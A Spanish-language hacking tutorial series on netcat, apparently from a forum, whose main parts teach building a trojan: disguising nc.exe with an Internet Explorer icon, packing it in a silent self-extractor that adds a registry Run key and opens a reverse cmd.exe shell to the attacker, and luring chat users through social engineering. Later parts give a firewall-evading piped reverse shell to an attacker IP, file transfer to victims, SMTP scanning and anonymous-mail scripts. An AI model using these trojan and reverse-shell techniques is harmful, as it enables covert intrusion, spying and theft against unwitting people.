JUGANDO CON NETCAT V1.

1
Parte I


Como ya les habrn enseado a utilizar el netcat, ahora yo les quiero ensear como
sacarle el jugo a este programilla muy til lo convertiremos desde un troyano hasta
un cliente SMTP entre otras cosas.


TROYANIZANDO NETCAT

Como ya saben, con netcat puedes tomar una shell directamente o realizar una
conexin inversa indicando mi IP o direccin DNS (para los que no saben lo que
es un DNS es un tipo de traduccin que hace mas fcil poder encontrar tu PC,
por ejemplo la IP 200.32.22.25 sera el DNS = pagina.cl ).

Bueno primero hay que saber lo que vamos a hacer la idea principal ser
tomar una shell de la PC de cualquier persona de un IRC (Chat).

Materiales:
ResHacker
Netcat v1.1
Winrar (Modo grafico)
Un icono de Internet Explorer.

Bueno, si no saben donde encontrar el icono tratare de drselos con este
documento XD si no se puede pueden usar cualquier otro icono (puedes
hacerlo sin iconos tambin pero se ver sospechoso.)

Lo primero es conectarse a un Chat XD y conseguirse a alguna victima (ojala no
lo hagan con sus novias porque si los pillan los van a patear XD ) una ves que
digan.. esa es mi victimaaaaa!!! entonces usaremos algo que se llama
ingeniera social y es a travs del ingenio propio hacerse pasar por alguien o
hacerse de la amistad de esa persona para poder obtener lo que queremos, la
idea es que hablaremos con el y bla bla bla de donde eres bla bla bla cuando
termines le dices que otro da seguimos conversando si todo va bien ps ya
maana tendrs la confianza suficiente como para darle un programa que le
ayudar en el mantenimiento de su PC o que simplemente se divierta con un
juego XD.

Dejamos de lado el Chat y en la noche nos ponemos a hacer el troyano de la
siguiente forma:


Paso 1: Primero le cambiamos el icono para que sea menos sospechoso con el ResHacker:



En primer lugar abres el ResHacker y le das en "File/Open" y buscas el netcat. Despus pinchas
en accin y luego en "Add a new Resource", luego se ver la ventana que ves a la derecha y
presionas donde dice Open file with new resource (paso 3) para buscar el icono que
teniamos, luego donde dice Resource Name Debes escribir la palabra ICON tal como se ve
en la foto y para finalizar presionamos en Add Resource y en File/Save. Con todo esto te
crear un respaldo del netcat original que puedes borrarlo con toda tranquilidad y al refrescar
la pantalla (F5) veras que el netcat tiene el mismo icono de Internet Explorer XD



Paso 2: renombramos nc.exe y desde ahora se llamar iexplorer.exe XD, luego pinchas el
netcat con el botn derecho de tu Mouse y deber aparecer algo as (obviamente despus de
haber instalado el winrar.)



Luego aparecer el Winrar y empezaremos a crear nuestro troyano:

1.



Donde dice Nombre del archivo le escribimos carnada.exe (por ahora), el formato debe ser
en RAR el mtodo de compresin el mejor y por ltimo y mas importante Crear un archivo
SFX, el resto debe quedas deseleccionado.



2.



En la pestaa Avanzado (arriba) debes pinchar el botn llamado Opciones SFX y
comenzaremos a configurar nuestro Winrar SFX.













3.



Ahora en Carpeta de extraccin le diremos que descomprima el netcat (con nombre de
iexplorer) en el directorio = %homedrive%%homepath%\update , ahora me diran: Que es
esto?!! %homedrive% significa que se descomprimir dentro de la misma unidad de disco
que est Windows, o sea comnmente (no siempre) C:\ %homepath% significa
Documents and settings\tu usuario actual en conclusin se descomprimir dentro del
directorio raiz del usuario donde es casi el nico lugar donde un usuario sin derechos de
administrador puede sobrescribir, en otras palabras si le hubiese escrito %windir%\system32
pudiera haber tenido fallas al descomprimirse ya que no todos tienen derecho a ese directorio.
Eleg una carpeta llamada update para llamar menos la atencin.
En Ejecutar tras la extraccin le escribimos esto = iexplorer.exe -d -e cmd.exe [aca va
nuestra ip] 80 , yo le puse la direccin 127.0.0.1 para pruebas pero ustedes le ponen la ip real
que sale a Internet. 80 es el puerto donde el troyano se conectar con nosotros.

En Ejecutar antes de la extraccin le escribimos lo siguiente = %windir%\system32\cmd /c
reg add HKcU\Software\Microsoft\Windows\CurrentVersion\Run /v "iexplorer" /t REG_SZ
/d "%homedrive%%homepath%\update\iexplorer.exe -d -e cmd.exe 127.0.0.1 80" /f > nul
y ustedes me diran que es eso!!!!... le decimos que ejecute la consola de comandos CMD y
llame a un ejecutable llamado REG.EXE el cual se encargar de agregar nuestra entrada al
registro del sistema para que el troyano arranque solito cada ves que encienda la pc (recordar
que donde dice 127.0.0.1 deben poner la ip de ustedes o en algunos casos (para los que saben)
su DNS es mas efectivo. (Consultar por el no-ip) y donde dice >nul significa que la victima no
ver mas que un simple pestaazo del DOS en ves de mostrar todo lo que se est ejecutando.


4.



Ac estamos pidiendo a winrar que no muestre nada mientras se instala todo esto, asi ser
mas silencioso, rpido y automatizado.








5.



Por ltimo cargamos un icono atractivo para que se vea con el troyano ya compilado y
aceptamos todas las ventanas.


Debera quedar algo as:



Yo le puse icono de yahoo porque lo voy a probar desde el mismo Chat.


Ahora vamos a crear el programa que nos conectar con la victima, y se llama Cliente
Solo ejecutamos esto y estaremos listos para recibir la conexin de quien abra la carnada:



Y listo ahora solo falta visitar a nuestro amigo del da anterior y decirle que tienes un juego
muy chido o que tienes algo para no se usa tu imaginacin. En mi caso y entr a una sala de
yahoo y como hoy en da esta muy de moda los booters XD puse en sala que bajaran un
antibooter para que no los pudieran sacar de la sala y les pase un link con la direccin donde
estaba alojado el troyano. En resumidas cuentas si alguien cae en tus maldades te debe
aparecer esto:




Habrs tomado la shell de otra PC (manejar una shell de otra pc significa poder controlar el
DOS de Windows o la shell de GNU.. es poder controlar la consola de comandos de la otra
persona y a travs de eso puedes subirle archivos, borrarle cosas, darle troyanos que te
permitan ver su escritorio mirar sus contraseas volcando el registro en textos y hacindoles
un type para los que saben un poquitito mas.. talvez saltar a otras pc con netbios, exploits
como el dcom, acceder a servidores y dominar una red completa y ufff.. a volar la imaginacin.
Si no me creen miren estas tres capturas jugando con netcat XD nada serio:


1. El sueo de todo lamer XD :










2. Subiendo RealVnc4 para poder hacer una conexin iversa y mirar el escritorio de la otra
persona:














3. Esto fue un ajuste de cuentas XD:




Les mostr como crear un troyano con netcat (indetectable por todos los antivirus por ahora)
tambin puede hacerse con una conexin directa en ves de una inversa como la hice ac, as
como ya saben hacerlo

Esto es todo y espero poder mostrarles la prxima ves.. como convertir el Netcat v1.1 en un
cliente SMTP para enviar correos automatizados y temporizados adems de servir como
cliente FTP con comandos automatizados sin la necesidad de la intervencin de escribir los
comandos desde la consola, tambin como ponerle contrasea a una sesin de shell con
netcat entre muchas otras cosas mas

Video ahn mas explicativo: http://whk.h4ck1ng.net/
El video est en la seccin de descargas.

Preguntas mas frecuentes:
Porque me aparece que el archivo no existe?
R: http://foro.elhacker.net/index.php/topic,159799.msg860791.html#msg860791

Porque me dice error win32?
R: Estas intentando cambiar el icono al netcat V1.1, intenta con el 1.0

Porque me dice ""nc" no es un comando reconocido"?
R: http://foro.elhacker.net/index.php/topic,159799.msg758631.html#msg758631

Porque me aparece "h_errno 11001: HOST_NOT_FOUND" ?
R: http://foro.elhacker.net/index.php/topic,159799.msg754376.html#msg754376
















JUGANDO CON NETCAT V1.1
Parte II


TRANSFORMANDO NETCAT EN UN CLIENTE SMTP Y FTP

Bueno ahora les mostrar que no es necesario usar el bombermail, el feeboti,
xmass o cualquier pendejada para enviar un correo sin tener que usar telnet.
Claro est que hay programas que tienen muchas funciones como libreta de
direcciones, escaneadotes de servidores SMTP, comprobacin de usuarios y
otras cosas que nos hacen todo ya automatizado en una linda ventanita grafica
pequea o tremendas presentaciones flash como el bomber de dragon XD,
pero todo lo que pueden hacer estos programas tambin puede hacerlo tu
Netcat v1.1.

Materiales:
Netcat v1.1
Un editor de texto (el block de notas es ideal)

Si se han fijado enviar un mail desde una consola NT no es muy fcil porque
no viene por defecto algun programa que lo haga como el comando mail de
GNU, pero si obtenemos una shell remota sobre una pc con netcat puedes
usar el mismo para enviar correos, archivos y lo que se te de la gana.

Creamos un texto con el block de notas que contenga lo siguiente:

helo queteimporta@yahoo.com
mail from: yan@anonimo.com
rcpt to: yan_uniko_102@yahoo.com.mx
data
From: yan@anonimo.com
To: yan_uniko_102@yahoo.com.mx
Subject: Provando netcat

Este es mi primer mensaje enviado con netcat
.


Bueno y que es esto en resumidas palabras?:
Helo = nos identificamos
mail from = correo proveniente
rcpt to = correo destino
data = el mensaje en si.

Dentro del mensaje decimos que el correo proviene desde yan@anonimo.com
para yan_uniko_102@yahoo.com.mx con el sujeto: probando netcat y con el
mensaje: Este es mi primer mensaje enviado con netcat. Ahora fjense de
dos detalles muy importantes. Uno es el espacio en blanco entre la cabecera
del mensaje y el mensaje en si (entre subset y este es mi) y segundo el
punto al final del mensaje.
Lo guardamos como queramos, yo eleg guardarlo como mensaje.txt y
ejecut lo siguiente: type mensaje.txt|nc -vv -w 3 127.0.0.1 25 y me apareci
algo como esto:



Puedes ver que todos los comandos que escribimos en el notepad se volcaron
al netcat y se realiz la conexin y el envo automatizado. Ahora analicemos el
comando un poco.

type mensaje.txt|nc -vv -w 3 127.0.0.1 25

type mensaje.txt = decimos que se vuelque el contenido de mensaje.txt en
pantalla
| = decimos que al mismo tiempo ejecute el siguiente comando
nc -vv -w 3 127.0.0.1 25 = decimos que netcat se conecte al host 127.0.0.1
(servidor SMTP) hacia el puerto 25 -w 3 significa que espere tres segundos
antes de enviar el correo para darle tiempo al servidor de reaccionar -vv
(Very Verbose) significa que te muestre lo que se est haciendo.

Podemos utilizar comandos como attach para enviar archivos adjuntos o
crear nuestras propias planillas en texto y con un simple bat enviarlos a
distintos destinatarios podemos jugar mucho con este codigo hasta hacer un
enorme bat que recoja el mismo mensaje para diferentes destinatarios dentro
de un texto guardado llamado user a travs del comando for. (el spam es
delito XD ). Una buena ventaja de todo esto es que puedes hacer el texto con
el comando echo de la siguiente manera:

Echo helo queteimporta@yahoo.com > mensaje.txt
Echo mail from: yan@anonimo.com >> mensaje.txt
Echo rcpt to: yan_uniko_102@yahoo.com.mx >> mensaje.txt
Echo data >> mensaje.txt
Echo From: yan@anonimo.com >> mensaje.txt
Echo To: yan_uniko_102@yahoo.com.mx >> mensaje.txt
Echo Subject: Provando netcat >> mensaje.txt
Echo. >> mensaje.txt
Echo Este es mi primer mensaje enviado con netcat >> mensaje.txt
Echo . >> mensaje.txt

O puedes usar el comando for de la siguiente manera:

for /f %%i in (direcciones.txt) do Echo rcpt to: %%i >> mensaje.txt

y ufff puedes hacer mil cosas como hasta escanear servidores SMTP con
netcat hacienda un:

for /l %%i in (1,1,254) do if errorlevel = 0 nc 1 192.168.1.%%i 25|find "smtp"
&& echo 192.168.1.%%i >>escaner.txt

y los que estn dentro del rango de IPs seleccionadas y que respondan al
puerto 25 con un barrer SMTP se escribir su IP dentro de un texto llamado
scanner.txt tambin puedes usar el comando for para volcar textos con un
listado amplio de IPs creados talvez por el dictmake.exe o el brainscan.exe o
con otro bat XD.

Yo puse 127.0.0.1 de servidor en el primer ejemplo porque yo mismo utilic un
minirelay para poder enviar el correo ya que me dio flojera buscar un servidor
para probar :p



Y al revisar el correo me encontr con mi netcat








Ahora esto tambin sirve para automatizar subidas y descargas de archivos a
un ftp con tu netcat y decir por ejemplo que cada una hora me respalde mis
archivos en mi ftp pero que primero borre los antiguos, en resumidas palabras
seria algo as:


type comando.txt|nc -vv -w 3 127.0.0.1 21


y el commando.txt dira algo as:

user usuario
pass password
dele respaldo.rar
etc etc etc y al final quit

y veras como el netcat entra a tu ftp, borra el respaldo y coloca el nuevo. Para
poder temporizar esto puedes usar un comando muy facil que me ense un
muy buen amigo mo (Octhal):

ping 127.0.0.1 -n 2 >nul

Esto equivale a un segundo o sea para que esto se transforme en una hora
quedara as:

ping 127.0.0.1 -n 7200 >nul

Con todo esto tu bat debera quedar as:

@Echo off
Cls
:1
Echo Ultima actualizacion: %time% %date%
type comando.txt|nc -vv -w 3 127.0.0.1 21
ping 127.0.0.1 -n 7200 >nul
goto 1

Decimos que respalde nuestros archivos y que despus de una hora se haga un
goto para hacer un loop. Tambin puedes usar esto para subir archivos desde
una PC tomada con tu shell y ponerles, obviamente tu como servidor.

Como puedes ver ac mostr como hacer interactuar el netcat con un
servidor y transformarlo en un anonimail XD o ftp client tambin puedes
hacer un consultador SQL, un bot IRC, un cliente tftp etc etc etc es solo cosa
de imaginacin
La prxima vez les ensear como ponerle contrasea a netcat para que nadie
usurpe tus shells con o sin conocimientos de programacin.
Hasta la prox.

























JUGANDO CON NETCAT V1.1
Parte III


PONIENDO UNA CONTRASEA A TUS SHELLS

Ahora les demostrar que no es necesario saber programar en C para crear un
dispositivo que nos permita entrar en una shell a travs de una contrasea.

Lo primero es abrir el block de notas y escribimos lo siguiente:

@echo off
if not exist ips.txt (goto 1) else goto 2

:1
Echo ips.txt no existe
Echo.
pause
exit

:2
for /f %%i in (ips.txt) do netstat -n|find "%%i" && CMD
Echo Te has desconectado del servidor remoto.
Exit

Ahora me diras.. que es esto?!.. tranquilo, despus lo explico XD. Ahora crea
otro texto llamado Iniciar servidor.bat con el siguiente contenido:

start nc -L -d -e index.bat -p 5051

Tambin lo explicar despus ahora crea otro texto llamado Detener
servidor.bat con el siguiente contenido:

tskill nc

Luego crea un texto llamado ips.txt y dentro del texto le escribes tu ip y las ip
que tu quieres que tengan acceso a esa shell, y por ltimo pon el netcat junto
con todo esto en una carpeta guardada por ah talves en system32 o donde tu
quieras pero todo debe estar en el mismo lugar a menos que quieras modificar
el codigo fuente del bat.
Es hora de dar las explicaciones:

Al abrir el bat llamado iniciar servidor.bat ejecutaras el netcat y lo dejaras a
escucha de otro bat llamado index.bat en el puerto 5051 (a eleccin), luego
si alguien se conecta a tu shell se iniciar netcat y comenzar a leer los
comandos del bat y resolver lo siguiente:

if not exist ips.txt (goto 1) else goto 2
:1
Echo pass.txt no existe
Echo.
pause
exit

Esto significa que si no existe el archivo con las IP, entonces solo se cierra
botndote de la shell, si existe entonces procede a hacer el chequeo:

for /f %%i in (ips.txt) do netstat -n|find "%%i" && CMD
Echo Te has desconectado del servidor remoto.
Exit

Nos fijaremos principalmente en la primera lnea de esta frase y analizaremos
que %%i se transforma en las ip puestas en el texto llamado ips.txt y ejecuta:
netstat -n|find "%%i" && CMD lo cual significa que hace un netstat n
mostrando todas las ip conectadas a ti (incluyendo el que est pidiendo la
shell) y al mismo tiempo el comando find busca entre todas esas IPs que estan
conectadas si coincide alguna con la ip sealada en el texto y si esta aparece
ejecuta CMD y si no aparece te bota de la shell (Por eso es recomendable
no poner mas que solo tu ip dentro de ese texto porque si hay un usuario
logueado entonces todos los demas tendran acceso libre sin autentificacin. Y
ojala no sea 127.0.0.1 ni tu ip externa porque puede prestarse para
confusiones y no servir de nada todo esto.)
El comando tskill nc significa que mata el proceso llamado nc (el comando tskill
viene con todos los Sistemas Operativos NT desde Windows Xp con SP2 en
adelante o puedes reemplazarlo por otros comandos que destruyan el
proceso)

Como puedes ver no fue necesario saber programar en C para ponerle un
acceso seguro a tu shell y que nadie mas te la quite. Esto puede ser muy tiles
para administradores de pequeas redes que quieren tener acceso a ciertos
puntos de redes desde el servidor o para que nadie mas se meta en la PC de tu
novia mas que tu XD.


PARA PROGRAMADORES

Para los programadores en C puedes probar con una sentencia if donde if
pass=[loquequieras] un ejemplo:

#include <stdio.h>
#include <stdlib.h>
main()
{
int usuario,clave=84262;
printf("Introduce la contrasea: ");
scanf("%d",&usuario);
if(usuario==clave)
printf("Acceso concedido!.\n\n");
else
exit (1);
system("cmd.exe");
exit (0);
}

Esto se me ocurri en mis ratos de ocio XD, cuando lo abres te pide una
contrasea y si es la escrita en el codigo fuente, ps te da la shell y si no te da
una salida limpia.

Listo amigos hasta aca llego por ahora.. ya es tarde y otro dia continuo a
grandes rasgos quise demostrar que no se necesita ser programador en C o
ingeniero en programacin para poder ponerle una pequea contrasea
automatica por asi decirlo :p tambien puedes reemplazar las ip por dominios
DNS y reemplazar el comando netstat n por netstat solamente. Tambien
puedes hacer cosas mucho mas eficientes y complejas pero la idea es que por
ahora todos sin importar sus conocimientos puedan hacer esto.









JUGANDO CON
NETCAT
IV


Como convertir a netcat en un chat.

Bueno... esto es lo mas facil del mundo y no requiere partirse la
cabeza para poder hacerlo. Con este metodo puedes crear
aplicaciones de chat propio muy caseros. (Una forma mas de
utilizar netcat.)

Uno deve ponerse de servidor ejecutando lo siguiente:

nc -L -p (puerto) -vv

y la otra persona como cliente ejecutar lo siguiente:

nc (ip del servidor) (puerto)

y ambos podrn interactuar sin la necesidad de ejecutarse
comandos uno al otro ni nada por el estilo...
Esto es muy muy muy basico y sencillo, ademas puedes
incorporarlo a algun proyecto hecho en visual basic para crear tu
propio chat con emoticones y una buena apariencia grafica.

Este articulo no es tan importante como los dos primeros pero
como su titulo india "jugando con netcat" esta es una de las
muchas formas de sacarle el jugo.



Ahora voy a explicar lo que pas ac:

nc -L -p (puerto) -vv Dijimos que -L: seguiremos conectados
Aunque nuestro amigo sedesconecte... asi podremos seguir en
espera de otras personas o del mismo. -p: es el puerto que usamos
para comunicarnos. -vv:Very Verbose. o sea que mostraremos los
mensajes que nos estan llegando.
Ahora ustedes dicen "porque no podemos ejecutar cosas como en
la primera parte de jugando con netcat???" muy simple... porque
omitimos el comando: -e cmd.exe el cual nos permita escuchar y
manejar lo que hacia la consola de comandos, pero tambien
puedes hacerlo con otras cosas, por ejemnplo un bat que te
buelque un contenido de un texto... asi solo ves los logs de algo
cuando llamas a un server o enviar reportes de algo cada cierto
tiempo a alguna parte o transferir mensajes en modo pgp:
Cdigo:
@echo off
Echo enviando mensaje:
type pgp.txt
Echo.
Echo Fin. Cerrando coneccin.
exit
y luego haces un : nc -d -e reporte.bat ip puerto o nc -L -d -e
reporte.bat -p 25 .

Seores!... que quiero demostrar con este mini tutorial... que el netcat
sirve para muchas cosas y no tan solo para tomar una shell... el netcat es
una herramienta GNU y no un troyano.

El video explicativo (si esque no entendieron) pueden bajarlo como
siempre desde ac: http://512.iespana.es/nc

















JUGANDO CON
NETCAT
V

NETCAT PARA TRANSFERENCIA DE ARCHIVOS
no tendran que usar FTP ni TFTP una ves teniendo NC en la victima


Lo primero sera prepararnos como servidor [ atacante ] para que el cliente [ victima ]
posteriormente conecte a nosotros y descarge el file

sintaxis
Cdigo:
nc -l -p PUERTO < FILE




Ahora desde la shell de la victima conectaremos a nosotros y recibiremos el file

sintaxis:
Cdigo:
nc IP PUERTO > FILE


Ahora esperaremos un momento [ parecera que se colgo la shell ] pero no
XD ... para comprobar que ya se descargo realizamos un dir en el
servidor destino



como pueden ver el tamao es de 700.416 bytes por lo tanto el archivo
a sido descargado con exito

ahora solo queda precionar CTRL+C en la shell del cliente para detener
el comando


Jugando con Netcat VI


Shell volteada o pipelada:


Bien hasta ahora nosotros conocemos la tecnica de la shell directa e
inversa, probemos la inversa, nos las ingeniamos para que la victima deje
un puerto a la escucha...




Este comando camuflado con el metodo del iexplore tendria el mismo
efecto, hace saltar el firewall de XP SP2 !!, y por lo tanto nosotros no nos
podemos conectar a la victima...



EL firewall de XP SP2 detecta que actua como un servidor y lo
bloquea!!

Asi, que que podemos hacer ??, pues una shell pipelada o volteada.

Esta tcnica se basa en que la mayoria de los firewall aceptan la entrada
de datos por el puerto 21 y la salida de estos por el puerto 25, de esta
manera podemos burlar al firewall sin matarlo ni agregar el Netcat a la
lista de excepciones.

El atacante deber ejecutar los comandos:


nc ?vv ?L ?p 21 --> La ventana por la que dar las ordenes
nc ?vv ?L ?p 25 --> La ventana por la cual ver el resultado de las
mismas.




Y la vctima debe ejecutar:

nc ?d <IP_ATACANTE> 80 | cmd.exe | nc ?d <IP_ATACANTE> 25





Explicacion:

Usamos " pipes ", esto es basicamente un metodo para transmitir datos
entre programas, nos conectamos al puerto 21 del atacante, todo lo que
recibamos por ese puerto ser redirigido a cmd.exe usando " | ", el
resultado que d cmd.exe ser a la vez redirigido a la conexion que
tenemos con el puerto 25 de la victima.

Por ese motivo las ordenes o comandos debemos escribirlos en la ventana
en la que escuchemos el puerto 21 y recibiremos el resultado en el puerto
25.

Por que usamos el puerto 21 (FTP) ?

Pues por que el firewall de XP SP2 admite por defecto la entrada de
datos por dicho puertos, como tambien la admite por el puerto 80, etc...

Por que usamos el puerto 25 (SMTP) ?

Pues basicamente lo mismo que lo anterior, pero en este caso lo
permitido es la salida de datos.



Entonces en la nos saldra esto:





En la ventana donde escuchamos el puerto 21 escribiremos los comandos
y en la que usamos el puerto 25 veremos el resultado...

Y todo esto sin que el firewall no diga ni pio!!, la unica forma de que nos
funcione un Netcatt troyanizado usando unicamente el Netcat para
esquivar el firewall...















By
3L3cTr0N1k_0.